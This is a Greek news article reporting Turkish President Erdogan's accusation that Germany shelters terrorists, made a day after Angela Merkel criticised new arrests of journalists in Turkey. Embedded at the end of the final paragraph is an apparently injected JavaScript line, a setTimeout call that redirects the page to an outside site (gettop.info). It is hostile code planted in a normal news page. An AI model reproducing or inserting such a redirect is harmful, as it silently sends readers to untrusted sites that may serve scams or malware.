«Πυρά» Ερντογάν κατά Μέρκελ: Η Γερμανία υποθάλπει την τρομοκρατία

0
8

 

Μία μόλις ημέρα μετά την κριτική που άσκησε η Άνγκελα Μέρκελ για το νέο κύμα συλλήψεων δημοσιογράφων στην Τουρκία, ο Πρόεδρος της χώρας Ταγίπ Ερντογάν επιτέθηκε στην Καγκελάριο της Γερμανίας λέγοντας ότι «η Γερμανία υποθάλπει την τρομοκρατία».

«Μας δίνουν συμβολές. Αλλά εμείς είμαστε αυτοί που ανησυχούμε για τη στάση σας. Βοηθάτε την τρομοκρατία. Δεν έχουμε προσδοκίες από εσάς, αλλά η Ιστορία θα σας θυμάται για το ότι δώσατε καταφύγιο στην τρομοκρατία» σημείωσε ο Ερντογάν.

Ο Τούρκος Πρόεδρος κατήγγειλε ότι η Γερμανία επί χρόνια φιλοξενεί τρομοκράτες, όπως μέλη του κουρδικού PKK και του DHKP-C, προσθέτοντας ότι πλέον έχει μετατραπεί σε χώρο συγκέντρωσης υποστηρικτών του Γκιουλέν.

«Η Γερμανία έχει γίνει καταφύγιο των τρομοκρατών. Γίνονται ρατσιστικές επιθέσεις εναντίον Τούρκων στη Γερμανία. Είναι απαράδεκτο το γεγονός ότι η Γερμανία προστατεύει τους τρομοκράτες» τόνισε ο Ερντογάν και πρόσθεσε «εάν η Γερμανία αμφιβάλλει ότι η οργάνωση Γκιουλέν είναι τρομοκρατική ομάδα, τους προσκαλώ να επισκεφτούν την τουρκική Βουλή και το κτίριο των ειδικών δυνάμεων που βομβαρδίστηκαν κατά την απόπειρα πραξικοπήματος». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here